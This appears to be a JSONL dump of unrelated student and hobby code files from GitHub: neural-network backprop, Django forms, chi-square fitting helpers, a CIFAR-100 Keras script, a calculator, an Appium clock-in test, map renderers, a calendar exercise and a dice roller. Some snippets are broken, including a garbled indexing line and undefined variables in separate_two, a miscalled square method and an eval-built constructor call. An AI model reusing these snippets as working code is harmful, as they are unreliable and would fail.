reversed(range(1, n_layers)):\n g = self.D_outs[i] * self.activ_fs[i].grad\n self.D_weights[i] += np.outer(g, self.outs[i - 1])\n # remove bias column and transpose\n wT = self.weights[i][:, :-1].transpose()\n self.D_outs[i - 1] = np.dot(wT, g)\n\n # first hidden layer uses self.input\n g = self.D_outs[0]\n g = g * self.activ_fs[0].grad\n self.D_weights[0] += np.outer(g, self.input)\n return self\n\n def get_grad(self):\n \"\"\"Return the currently stored gradient.\"\"\"\n total_gradient = [Dw.flatten() for Dw in self.D_weights]\n total_gradient = np.concatenate(total_gradient)\n return total_gradient\n\n def zero_grad(self):\n \"\"\"Set the stored gradient to zero.\"\"\"\n for D_w in self.D_weights:\n D_w.fill(0.0)\n","repo_name":"michelebersani/ComputationalMathematics","sub_path":"NN/NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":4957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"39376756783","text":"from django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom directory.models import Competitors\nfrom admin_panel.models import *\n\n\nclass CustomCreationForm(UserCreationForm):\n \"\"\"Форма регистрации пользователя\"\"\"\n\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'password1']\n\n def save(self):\n user = super(CustomCreationForm, self).save(commit=True)\n Profile.objects.create(\n user=user,\n access_level=AccessLevel.objects.get(id=3)) # Права по умолчанию\n return user\n\n\nclass CustomUpdateUserForm(UserChangeForm):\n \"\"\"Форма редактирования профиля пользователя\"\"\"\n\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'email']\n\n def save(self, level_id, competitor=None):\n user = super(CustomUpdateUserForm, self).save(commit=True)\n access_level = AccessLevel.objects.get(level=level_id)\n try:\n profile = Profile.objects.get(user=user)\n profile.access_level = access_level\n profile.save()\n if competitor:\n competitor = Competitors.objects.get(pk=competitor)\n profile.competitor = competitor\n profile.save()\n else:\n profile.competitor = None\n profile.save()\n except Profile.DoesNotExist:\n Profile.objects.create(user=user, access_level=access_level)\n return user\n","repo_name":"mnmyasis/fedor_app","sub_path":"fedor/admin_panel/services/forms/create_update_user_forms.py","file_name":"create_update_user_forms.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74144022912","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom iminuit import Minuit\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy.stats as stats\nimport sympy as sp\nimport seaborn as sb\nfrom ExternalFunctions import Chi2Regression\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\n\n\n# In[99]:\n\n\ntest = 10*np.array([2.69,2.71,2.56,2.48,2.34,2.79,2.54,2.68,2.69,2.58,2.66,2.70])\nerrs = [1,1,1,1,1,1,1,1,0.01,1,1,1,]\n\n\n# In[39]:\n\n\ndef weighted_avg(y,x=None,yerr = None,ax = None,label=\"Data\",col = \"k\"):\n if not x:\n x = range(len(y))\n if not yerr:\n yerr = np.ones(len(y))*np.std(y)\n func = lambda x,a: a + 0*x\n chi = Chi2Regression(func,x,y,yerr)\n mi = Minuit(chi,pedantic = False,print_level=0,a=1)\n mi.migrad()\n a = mi.args[0]\n err = mi.errors[0]\n xx = np.linspace(min(x),max(x),1000)\n \n if not ax:\n fig, ax = plt.subplots()\n ax.errorbar(x,y,yerr=yerr,fmt = col+'.',capsize = 2,label = label)\n ax.plot(xx,func(xx,a),ls='--',c='b',label = \"Average: ${:.3}\\pm{:.3}$\".format(a,err))\n ax.legend()\n \n return mi,ax\n\n\n# In[78]:\n\n\ndef fit_unit_gauss(x,y,yerr,muguess=None,ax=None,col='k',label = \"Data\"):\n if not muguess:\n muguess = (max(x)-min(x))/2\n func = lambda x,mu,sigma: stats.norm.pdf(x,mu,sigma)\n chi = Chi2Regression(func,x,y,yerr)\n mi = Minuit(chi,pedantic = False,print_level=0,mu = muguess,sigma = 1)\n mi.migrad()\n mu,sigma = mi.args\n \n xx = np.linspace(min(x),max(x),1000)\n if not ax:\n fig, ax = plt.subplots()\n ax.errorbar(x,y,yerr=yerr,fmt = col+'.',capsize = 2,label = label)\n ax.plot(xx,func(xx,*mi.args),ls='--',c='b',label = \"Gauss$(\\mu: {:.3},\\sigma: {:.3})$\".format(mu,sigma))\n ax.legend()\n \n return mi,ax\n\ndef fit_gauss(x,y,yerr,muguess=None,ax=None,col='k',label = \"Data\"):\n if not muguess:\n muguess = (max(x)-min(x))/2\n func = lambda x,mu,sigma,a: stats.norm.pdf(x,mu,sigma)*a\n chi = Chi2Regression(func,x,y,yerr)\n mi = Minuit(chi,pedantic = False,print_level=0,mu = muguess,sigma = 1,a=1)\n mi.migrad()\n mu,sigma,a = mi.args\n \n xx = np.linspace(min(x),max(x),1000)\n if not ax:\n fig, ax = plt.subplots()\n ax.errorbar(x,y,yerr=yerr,fmt = col+'.',capsize = 2,label = label)\n ax.plot(xx,func(xx,*mi.args),ls='--',c='b',label = \"Gauss$(\\mu: {:.3},\\sigma: {:.3})$\".format(mu,sigma))\n ax.legend()\n \n return mi,ax\n\n\n# In[74]:\n\n\n# testgauss = [185,1149,3265,5475,6114,5194,3067,1331,403,105,14,4]\n\n# t = fit_gauss(range(len(testgauss)),testgauss,np.sqrt(testgauss))\n\n\n# In[143]:\n\n\ndef chi2fit(x,y,yerr,func,guesses,label=\"Data\",ax=None,col='k',text=False,draw=True):\n chi = Chi2Regression(func,x,y,yerr)\n gstr = \"\"\n for key in guesses:\n gstr+=str(key)+\"=\"+str(guesses[key])+\",\"\n \n mistr = \"Minuit(chi,pedantic = False,print_level=0,\"+gstr+\")\"\n mi = eval(mistr)\n mi.migrad()\n \n if(draw):\n xx = np.linspace(min(x),max(x),1000)\n if not ax:\n fig, ax = plt.subplots()\n ax.errorbar(x,y,yerr=yerr,fmt = col+'.',capsize = 2,label = label)\n dstr = \"Fit values:\\n\"\n for i,key in enumerate(guesses):\n dstr+=str(key)+\"={:.3}$\\pm${:.3} \".format(mi.args[i],mi.errors[i])+\"\\n\"\n dstr+=\"\\n\"\n dstr+=\"$\\chi^2$={:.3}\\np-value={:.3}\".format(mi.fval,stats.chi2.sf(mi.fval,len(y)-len(guesses)))\n ax.plot(xx,func(xx,*mi.args),ls='--',c='b',label = \"Fit\")\n if(text):\n ax.text(text[0],text[1],dstr,transform=ax.transAxes)\n ax.legend()\n \n return mi,ax\n \n\n\n# In[181]:\n\n\n# func = lambda x,a,b: a*x+b\n# x,y = range(len(test)),test\n# yerrs = errs\n# guesses = {\"a\":2,\"b\":3}\n# textpos =(0.8,0.05)\n# fig,ax =plt.subplots(figsize=(10,6))\n# mi,ax = chi2fit(x,y,yerrs,func,guesses,text=textpos,ax = ax)\n\n\n# In[222]:\n\n\ndef errorpropagate(func,symbols = None,correlation=None):\n if not symbols:\n symbols = func.free_symbols\n inner=0\n cor = 1\n for s in symbols:\n sig = sp.symbols(\"\\\\sigma_{\"+str(s)+\"}\")\n inner += sp.diff(func,s)**2*sig**2\n cor *= sp.diff(func,s)*sig\n if(correlation):\n inner+=2*cor*correlation\n return sp.sqrt(inner)\n\n\n# In[223]:\n\n\n# x,y,rho = sp.symbols(\"x y \\\\rho\")\n\n# errorpropagate(x*y**2,correlation=rho)\n\n\n# In[378]:\n\n\ndef from_same_dist(dist1,dist2,labels=None,text = None,ax = None):\n if not ax:\n fig,ax = plt.subplots()\n if not labels:\n labels = (\"Distribution 1\",\"Distribution 2\")\n h1,b1 = dist1\n h2,b2 = dist2\n \n b1,b2 = ((b1+np.roll(b1,1))/2)[1:],((b2+np.roll(b2,1))/2)[1:]\n ax.errorbar(b1,h1,np.sqrt(h1),fmt=\".\",capsize=2,label=labels[0])\n ax.errorbar(b2,h2,np.sqrt(h2),fmt=\".\",capsize=2,label=labels[1])\n \n ks = stats.ks_2samp(h1,h2)\n chi2 = 0\n for t1,t2 in zip(h1,h2):\n if(t2>0):\n chi2 += (t1-t2)**2/t2\n if(text): \n txt = \"KS-statistic:{:.3}\\nKS-p-value:{:.3}\\n\\n$\\chi^2$-statistic:{:.3}\\n$\\chi^2$ p-value{:.3}\".format(ks[0],ks[1],chi2,stats.chi2.sf(chi2,2*len(h1)))\n ax.text(text[0],text[1],txt,transform=ax.transAxes)\n plt.legend()\n return ax,(chi2,stats.chi2.sf(chi2,2*len(h1))),ks\n\n\n# In[390]:\n\n\n# t1,t2 = np.random.normal(size=(2,1000))\n# d1 = np.histogram(t1,20,range=(-4,4))\n# d2 = np.histogram(t2,20,range=(-4,4))\n\n# from_same_dist(d1,d2,text=(0.1,0.6))\n\n\n# In[419]:\n\n\n# t1,t2,t3,t4 = np.random.normal(size=(4,1000))\n# t1+=3\n# t3+=3\n# d1 = np.concatenate((t1,t2))\n# d2 = np.concatenate((t3,t4))\n\ndef separate_two(d1,d2,separation=None):\n sb.jointplot(d1,d2,kind='kde')\n X = pd.DataFrame([d1,d2])\n X = X.transpose()\n X = StandardScaler().fit_transform(X)\n pca = PCA(n_components=2)\n Xfit = pca.fit_transform(X)\n principalDf = pd.DataFrame(data = Xfit\n , columns = ['principal component 1', 'principal component 2'])\n \n fig,ax = plt.subplots()\n s = principalDf['principal component 1']\n if separation!=None:\n dat1 = s[sseparation]\n ax.hist(dat1,bins=100)\n ax.hist(dat2,bins=100)\n else:\n ax.hist(principalDf['principal component 1'],bins=100)\n plt.show()\n \n if separation!=None:\n return (dat1,dat2),ax,xfit\n return principalDf,ax,Xfit\n\n\ndef do_lda(dat1,dat2):\n X = np.vstack((dat1, dat2))\n N = len(dat1)\n y = np.zeros(2*N) \n y[:N] = 1\n \n # initialise the LDA method\n sklearn_lda = LDA(n_components=2)\n\n # fit the data\n sklearn_lda.fit(X, y)\n\n # transform the data\n X_lda_sklearn = sklearn_lda.transform(X) \n\n print(f\"LDA coefficients: {sklearn_lda.scalings_}\")\n\n# dat,ax,xfit = separate_two(d1,d2,0)\n\n\n# # In[271]:\n\n\n# h\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"JakobSchauser/Blok1Troels","sub_path":"JFuncs.py","file_name":"JFuncs.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"36302189079","text":"from tensorflow.keras.datasets import cifar100\nimport pandas as pd\nimport numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D,Dense,Flatten, Dropout, MaxPooling2D\nfrom tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom keras.preprocessing.image import ImageDataGenerator\n\n\n\n\n#1. data\n\n(x_train,y_train), (x_test,y_test) = cifar100.load_data()\n\n#1) data 확인 \nprint(x_train.shape) # (50000, 32, 32, 3)\nprint(y_train.shape) # (50000, 1)\nprint(x_test.shape) #(10000, 32, 32, 3)\nprint(y_test.shape) # (10000, 1)\nprint(x_train[0]) # 32x32\nprint(y_train[0]) # [19]\n# print(np.unique(x_train[:2],return_counts=True)) # dtype=uint8\n# print(np.unique(y_train,return_counts=True)) # 클래스 100개 확인 완료\n\n\n#1) 정규화 (datasets 전처리)\n\n#1)) 실수형으로 변경\nx_train = x_train.astype('float32') / 255.0\nx_test = x_test.astype('float32') / 255.0\n# y_train = y_train.flatten()\n# y_test = y_test.flatten()\n# print(y_train)\n\n\n#2)) 원-핫 인코딩\n# y_train = np_utils.to_categorical(y_train)\n# y_test = np_utils.to_categorical(y_test)\n# num_classes = y_test.shape[1]\n\n\nx_train, x_val, y_train, y_val = train_test_split(\n x_train, y_train,\n train_size=0.8,\n random_state=42,\n shuffle=True,\n # y_train 훈련 (class)data 비율과 y_val 검증 (class)data 비율을 같게 함\n stratify=y_train\n)\n\n\n\ndatagen = ImageDataGenerator(\n # rotation_range=10,\n # zoom_range=0.1\n # shear_range=0.5,\n # width_shift_range=0.1,\n # height_shift_range=0.1,\n # horizontal_flip=True\n)\n\ndatagen.fit(x_train)\n\n\n\n#2. model\nmodel=Sequential()\nmodel.add(Conv2D(filters=64,kernel_size=(2,2),input_shape=(32,32,3),activation='relu', padding='same'))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Conv2D(filters=64,kernel_size=(2,2),activation='relu', padding='same')) \nmodel.add(MaxPooling2D(pool_size=(2,2)))\nmodel.add(Dropout(rate=0.5))\nmodel.add(Conv2D(filters=64,kernel_size=(2,2),activation='relu', padding='same')) \nmodel.add(Dropout(rate=0.5))\nmodel.add(Flatten()) \nmodel.add(Dense(512,activation='relu')) #inputshape = (batch_size, input_dim) -> 행무시 -> (40000,)로 표시\n #inputshape = (batch_size, input_dim)\nmodel.add(Dropout(rate=0.5))\nmodel.add(Dense(100, activation='softmax'))\n\n\n\n\n\n\n\n#3. compile, training\nmodel.compile(\n loss='sparse_categorical_crossentropy',\n optimizer='adam',\n metrics=['acc']\n)\n\nimport time\n\nstart=time.time()\n\n\n\n\nearly_stoppong=EarlyStopping(\n monitor='val_loss',\n patience=10,\n verbose=2,\n restore_best_weights=True\n)\n\nimport datetime\n\nnow_date=datetime.datetime.now()\nnow_date=now_date.strftime(\"%m%d_%H%M\")\n\nmodel_checkpoint=ModelCheckpoint(\n filepath='c:/study/_save/MCP/' + 'K34_cifar100_' + now_date + '_{epoch}-{val_loss:.4f}.h5',\n monitor='val_loss',\n verbose=2,\n save_best_only=True\n)\n\n\nmodel.fit_generator(datagen.flow(x_train,y_train,batch_size=500),\n epochs=40,\n verbose=2,\n validation_data=(x_val, y_val),\n callbacks=[early_stoppong],\n shuffle=True,\n)\n\nend=time.time()\n\n\n\n\n\n#4. 평가, 예측\n\nresults=model.evaluate(x_test,y_test)\n\n\nprint('loss : ',results[0]) # loss와 acc 값 2개 나옴\nprint('acc : ',results[1]) \nprint('걸린시간 : ',end-start)\n\n\n\n\n\"\"\"\nloss : 2.516951560974121\nacc : 0.37560001015663147\n걸린시간 : 92.03419232368469\n\ndrop rate 0.5로 변경\nloss : 2.35160493850708\nacc : 0.40470001101493835\n걸린시간 : 222.61408758163452\n\nloss : 2.312697410583496\nacc : 0.424699991941452\n걸린시간 : 229.69466423988342\n\n\nImageDataGenerator 추가 acc가 더 낮게 나옴\n0.3 나옴\n\nstratify 추가\n\n\n\n\n\n\n\"\"\"\n\n\n\n\n\n\n\n","repo_name":"zknight666/bit_study","sub_path":"keras/keras34_3_cifar100_2.py","file_name":"keras34_3_cifar100_2.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42098824350","text":"import math\n\n\nclass Calculator:\n\n def add(self, x, y):\n self.x = x\n self.y = y\n a = self.x + self.y\n return a\n\n def subtract(self, x, y):\n self.x = x\n self.y = y\n a = self.x - self.y\n return a\n\n def multiply(self, x, y):\n self.x = x\n self.y = y\n a = self.x * self.y\n return a\n\n def divide(self, x, y):\n self.x = x\n self.y = y\n\n if (y == 0):\n a = \"You can't divide by zero!\"\n else:\n a = self.x / self.y\n return a\n\n def potence(self, x, powP):\n self.x = x\n self.powP = powP\n return pow(x, powP)\n\n def square(self, number):\n self.number = number\n return round(math.sqrt(number))\n\n def module(self, x, y):\n self.x = x\n self.y = y\n return x % y\n\n\nloop = True\nwhile loop == True:\n op = input(\n 'Operación a realizar\\n1-Suma\\n2-Resta\\n3-Multiplicacion\\n4-Division\\n5-Potencia\\n6-Raiz\\n7-Modulo\\n')\n calc = Calculator()\n selected=int(op)\n if selected == 1:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.add(num_one,num_two)\n if selected == 2:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.subtract(num_one,num_two)\n if selected == 3:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.multiply(num_one,num_two)\n if selected == 4:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.divide(num_one,num_two)\n if selected == 5:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.potence(num_one,num_two)\n if selected == 6:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.square(num_one,num_two)\n if selected == 7:\n num_one=int(input('Ingresa primer numero'))\n num_two=int(input('Ingresa segundo numero'))\n result=calc.module(num_one,num_two)\n \n print(result)","repo_name":"diegomezg/python-practices","sub_path":"Practicas/p6/p6.py","file_name":"p6.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"16012385346","text":"\"\"\"\nFor visual debugging.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.patches import Polygon\nfrom random import random\nfrom pprint import pprint\n\n\nclass MatplotRenderer:\n\n def __init__(self, verbose=False):\n self.verbose = verbose\n plt.figure(figsize=(12, 12))\n plt.axis([-0.05, 1.05, -0.05, 1.05])\n self.ax = plt.subplot(1, 1, 1)\n\n def draw_reivers(self, map_obj):\n for edge in map_obj.edges:\n if not edge.river:\n continue\n\n self.ax.plot(\n [edge.corners[0].point[0], edge.corners[1].point[0]],\n [edge.corners[0].point[1], edge.corners[1].point[1]],\n '-', color='#1b6ee3', linewidth=edge.river)\n\n\nclass GraphRenderer(MatplotRenderer):\n\n def render_points(self, map_obj):\n x = [center.point[0] for center in map_obj.centers]\n y = [center.point[1] for center in map_obj.centers]\n self.ax.plot(x, y, 'go')\n plt.show()\n\n def render_centers(self, map_obj):\n x = [center.point[0] for center in map_obj.centers]\n y = [center.point[1] for center in map_obj.centers]\n self.ax.plot(x, y, 'go')\n\n for center in map_obj.centers:\n facecolor = (1, 1, 1)\n # if center.border:\n # facecolor = (0.2, 0.2, 0.8)\n p = Polygon([c.point for c in center.corners], facecolor=facecolor)\n self.ax.add_patch(p)\n\n if self.verbose:\n for edge in center.borders:\n self.ax.plot(\n [center.point[0], edge.midpoint[0]],\n [center.point[1], edge.midpoint[1]],\n 'k--')\n\n for neigh in center.neighbors:\n self.ax.plot(\n [center.point[0], neigh.point[0]],\n [center.point[1], neigh.point[1]],\n 'k:')\n\n plt.show()\n\n def render_corners(self, map_obj):\n x = [corner.point[0] for corner in map_obj.corners if not corner.border]\n y = [corner.point[1] for corner in map_obj.corners if not corner.border]\n self.ax.plot(x, y, 'go')\n\n x = [corner.point[0] for corner in map_obj.corners if corner.border]\n y = [corner.point[1] for corner in map_obj.corners if corner.border]\n self.ax.plot(x, y, 'b.')\n\n for corner in map_obj.corners:\n for neigh in corner.adjacent:\n self.ax.plot(\n [corner.point[0], neigh.point[0]],\n [corner.point[1], neigh.point[1]],\n 'k:')\n\n plt.show()\n\n def render_edges(self, map_obj):\n for edge in map_obj.edges:\n style = 'k-'\n if edge.border:\n style = 'g--'\n self.ax.plot(\n [edge.corners[0].point[0], edge.corners[1].point[0]],\n [edge.corners[0].point[1], edge.corners[1].point[1]],\n style)\n\n if self.verbose:\n for center in edge.centers:\n self.ax.plot(\n [center.point[0], edge.midpoint[0]],\n [center.point[1], edge.midpoint[1]],\n 'k--')\n\n plt.show()\n\n\nclass LandRendered(MatplotRenderer):\n\n def render(self, map_obj):\n for center in map_obj.centers:\n facecolor = '#ac9f8b'\n\n if center.water:\n facecolor = '#1b6ee3'\n\n if center.ocean:\n facecolor = '#abceff'\n\n if center.coast:\n facecolor = '#f0f5ea'\n\n p = Polygon([c.point for c in center.corners], facecolor=facecolor)\n self.ax.add_patch(p)\n\n # render water corners\n x = [corner.point[0] for corner in map_obj.corners if corner.water]\n y = [corner.point[1] for corner in map_obj.corners if corner.water]\n self.ax.plot(x, y, 'o', markerfacecolor='#1b6ee3')\n\n # render ocean corners\n x = [corner.point[0] for corner in map_obj.corners if corner.ocean]\n y = [corner.point[1] for corner in map_obj.corners if corner.ocean]\n self.ax.plot(x, y, 'o', markerfacecolor='#abceff')\n\n # render ocean corners\n x = [corner.point[0] for corner in map_obj.corners if corner.coast]\n y = [corner.point[1] for corner in map_obj.corners if corner.coast]\n self.ax.plot(x, y, 'o', markerfacecolor='#f0f5ea')\n\n plt.show()\n\n\nclass ElevationRenderer(MatplotRenderer):\n\n def __init__(self, verbose=False, rivers=True):\n self.rivers = rivers\n super(ElevationRenderer, self).__init__(verbose)\n\n def render(self, map_obj):\n for corner in map_obj.corners:\n if self.rivers and corner.river:\n markerfacecolor = '#1b6ee3'\n else:\n col = 1 - corner.elevation\n markerfacecolor = (col, col, col)\n self.ax.plot([corner.point[0]], [corner.point[1]], 'o', markerfacecolor=markerfacecolor)\n\n for center in map_obj.centers:\n if center.water:\n facecolor = '#1b6ee3'\n if center.ocean:\n facecolor = '#abceff'\n else:\n col = 0.2 + (1 - center.elevation) * 0.8\n facecolor = (col, col, col)\n\n p = Polygon([c.point for c in center.corners], facecolor=facecolor)\n self.ax.add_patch(p)\n\n if self.rivers:\n self.draw_reivers(map_obj)\n\n plt.show()\n\n\nclass MoistureRenderer(MatplotRenderer):\n\n def render(self, map_obj):\n for corner in map_obj.corners:\n col = 1 - corner.moisture\n markerfacecolor = (col, col, col)\n self.ax.plot([corner.point[0]], [corner.point[1]], 'o', markerfacecolor=markerfacecolor)\n\n for center in map_obj.centers:\n if center.water:\n facecolor = '#1b6ee3'\n if center.ocean:\n facecolor = '#abceff'\n else:\n col = 0.2 + (1 - center.elevation) * 0.8\n facecolor = (col, col, col)\n\n p = Polygon([c.point for c in center.corners], facecolor=facecolor)\n self.ax.add_patch(p)\n\n self.draw_reivers(map_obj)\n\n plt.show()\n\n\nclass BiomeRenderer(MatplotRenderer):\n\n def render(self, map_obj):\n light_vector = np.array([1, 1, 1])\n\n for center in map_obj.centers:\n biome_color = center.biome_color\n if center.water:\n p = Polygon([c.point for c in center.corners], color=biome_color)\n self.ax.add_patch(p)\n else:\n for edge in center.borders:\n lightning = calc_lightning(center, edge, light_vector)\n color_low = interpolate_color(biome_color, '#333333', 0.7)\n color_high = interpolate_color(biome_color, '#ffffff', 0.3)\n if lightning < 0.5:\n color = interpolate_color(color_low, biome_color, lightning)\n else:\n color = interpolate_color(biome_color, color_high, lightning)\n poly = [center.point, edge.corners[0].point, edge.corners[1].point]\n self.ax.add_patch(Polygon(poly, color=color, linewidth=2, linestyle='dotted'))\n\n self.draw_reivers(map_obj)\n\n plt.show()\n\n\nclass RegionRenderer(MatplotRenderer):\n\n def render(self, map_obj):\n region_colors = {\n None: '#ffffff'\n }\n regions = {}\n\n for center in map_obj.centers:\n if center.water:\n p = Polygon([c.point for c in center.corners], color=center.biome_color)\n self.ax.add_patch(p)\n else:\n if center.region not in region_colors:\n region_colors[center.region] = (\n max(0.2, random()),\n max(0.2, random()),\n max(0.2, random())\n )\n\n if center.region in regions:\n regions[center.region] += 1\n else:\n regions[center.region] = 1\n\n p = Polygon([c.point for c in center.corners], color=region_colors[center.region])\n self.ax.add_patch(p)\n\n for region in map_obj.regions:\n point = region.capital.point\n self.ax.plot([point[0]], [point[1]], 'o', markerfacecolor='#000000')\n\n self.draw_reivers(map_obj)\n\n plt.show()\n\n\ndef calc_lightning(center, edge, light_vector):\n # Return light level for each edge (0-1).\n light_vector = light_vector / np.linalg.norm(light_vector)\n\n c1 = edge.corners[0]\n c2 = edge.corners[1]\n\n v1 = np.array([\n center.point[0],\n center.point[1],\n center.elevation\n ])\n\n v2 = np.array([\n c1.point[0],\n c1.point[1],\n c1.elevation\n ])\n\n v3 = np.array([\n c2.point[0],\n c2.point[1],\n c2.elevation\n ])\n\n normal = np.cross(v2 - v1, v3 - v1)\n if normal[2] < 0:\n normal *= -1\n\n normal = normal / np.linalg.norm(normal)\n return 0.5 + 0.5 * np.dot(normal, light_vector)\n\n\ndef interpolate_color(color1, color2, f):\n \"\"\"\n Helper function for color manipulation. When f==0: color1, f==1: color2\n \"\"\"\n color1 = [int(color1[x:x+2], 16) for x in [1, 3, 5]]\n color2 = [int(color2[x:x+2], 16) for x in [1, 3, 5]]\n r = (1 - f) * color1[0] + f * color2[0]\n g = (1 - f) * color1[1] + f * color2[1]\n b = (1 - f) * color1[2] + f * color2[2]\n\n if r > 255:\n r = 0\n if g > 255:\n g = 0\n if b > 255:\n b = 0\n return '#%02x%02x%02x' % (r, g, b)\n","repo_name":"Alerion/fantasy_map","sub_path":"map/renderers.py","file_name":"renderers.py","file_ext":"py","file_size_in_byte":9780,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"60"} +{"seq_id":"18375803045","text":"'''\n企业微信打卡案例\n前提条件\n已登录状态( noReset=True)\n打卡用例:\n1、打开【企业微信】应用\n2、进入【工作台】\n3、点击【打卡】\n4、选择【外出打卡】tab\n5、点击【第N次打卡】\n6、验证【外出打卡成功】\n7、退出【企业微信】应用\n'''\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\n\n\nclass TestWeWork:\n def setup(self):\n caps = {}\n caps[\"platformName\"] = \"Android\"\n caps[\"deviceName\"] = \"Rose\"\n caps[\"appPackage\"] = \"com.tencent.wework\"\n caps[\"appActivity\"] = \".launch.LaunchSplashActivity\"\n # caps[\"ensureWebviewsHavePages\"] = True\n caps[\"noReset\"] = \"True\"\n # caps[\"settings[waitForIdleTimeout]\"] = 0\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', caps)\n self.driver.implicitly_wait(10)\n\n def teardown(self):\n self.driver.quit()\n\n def test_wework_daka(self):\n self.driver.find_element(MobileBy.XPATH, \"//*[@text='工作台']\").click()\n for i in range(3):\n try:\n self.driver.find_element(MobileBy.XPATH, \"//*[@text='打卡']\").click()\n break\n except Exception as e:\n print(e)\n # self.driver.find_element(MobileBy.ANDROID_UIAUTOMATOR,\n # 'new UiScrollable(new UiSelector().'\n # 'scrollable(true).instance(0)).'\n # 'scrollIntoView(new UiSelector().text(\"打卡\")'\n # '.instance(0));').click()\n self.driver.update_settings({'waitForIdleTimeout': 1})\n self.driver.find_element(MobileBy.XPATH, \"//*[@text='外出打卡']\").click()\n self.driver.find_element(MobileBy.XPATH, \"//*[contains(@text,'次��出')]\").click()\n assert self.driver.find_element(MobileBy.XPATH, \"//*[@text='外出打卡成功']\").text == '外出打卡成功'\n","repo_name":"Lusilucy/Sencond","sub_path":"16-19App/18WorkSpace/WXdaka/test_wework.py","file_name":"test_wework.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9661265758","text":"import string\r\n\r\ndaysInYear = 100\r\ndaysInMonth = 10\r\ndaysInWeek = 10\r\ndate = \"0001-01-01\"\r\n\r\ndef Week():\r\n dayOfTheWeek =[]\r\n for i in string.ascii_uppercase:\r\n dayOfTheWeek.append(i)\r\n\r\n return dayOfTheWeek\r\n\r\ndef y_m(daysInYear,daysInMonth):\r\n one_Yesr = daysInYear / daysInMonth\r\n Day_excess = daysInYear % daysInMonth\r\n \r\n return one_Yesr,Day_excess\r\n\r\ndef date_factor(date): \r\n date_YMW = date.split('-')\r\n date_Year = int(date_YMW[0])\r\n date_Month = int(date_YMW[1])\r\n date_Day = int(date_YMW[2])\r\n return(date_Year, date_Month, date_Day)\r\n\r\ndef main (Day_excess,date_Day,daysInWeek):\r\n if date_Day <= int(daysInMonth) and date_Month <= one_Yesr:\r\n if Day_excess == 0:\r\n while(date_Day > daysInWeek):\r\n date_Day = date_Day - daysInWeek \r\n #print(date_Day)\r\n print(dayOfTheWeek[date_Day-1])\r\n\r\n #elif date_Day > int(daysInMonth) or date_Month > one_Yesr:\r\n else:\r\n print(-1)\r\n\r\n#def youbi():\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n #lines = []\r\n daysInYear, daysInMonth, daysInWeek, date = input().split()\r\n #for l in sys.stdin:\r\n # lines.append(l.rstrip('\\r\\n'))\r\n #main(lines)\r\n #print(lines)\r\n dayOfTheWeek = Week()\r\n #print(dayOfTheWeek)\r\n one_Yesr,Day_excess = (y_m(int(daysInYear),int(daysInMonth)))\r\n #print(one_Yesr,Day_excess)\r\n date_Year, date_Month, date_Day = date_factor(date)\r\n #print(date_Year)\r\n main(int(Day_excess),int(date_Day),int(daysInWeek))","repo_name":"onoda4480/mycode","sub_path":"calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1384991085","text":"import tkinter\nfrom PIL import Image, ImageTk\nimport random\n\n# main window of application\nroot = tkinter.Tk()\nroot.geometry('800x800')\nroot.title('Roll the Dice')\n\n# Blank label for space \nl0 = tkinter.Label(root, text=\"\")\nl0.pack()\n\n# Label window\nl1 = tkinter.Label(root, text=\"Hey!\", font = \"Helvetica 16 bold italic\")\nl1.pack()\n\n# Image list\ndice = ['d1.png', 'd2.png', 'd3.png', 'd4.png', 'd5.png', 'd6.png']\n# Using random function selecting a random image from 1-6 numbers on dice\nimg1 = ImageTk.PhotoImage(Image.open(random.choice(dice)))\n\n# label for image\nlabel1 = tkinter.Label(root, image=img1)\nlabel1.image = img1\nlabel1.pack( expand=True)\n\n# function to define a command which selects image\ndef dice_roll():\n img1 = ImageTk.PhotoImage(Image.open(random.choice(dice)))\n # Updating image\n label1.config(image=img1)\n label1.image = img1\n \n# button for roll the dice\nbtn = 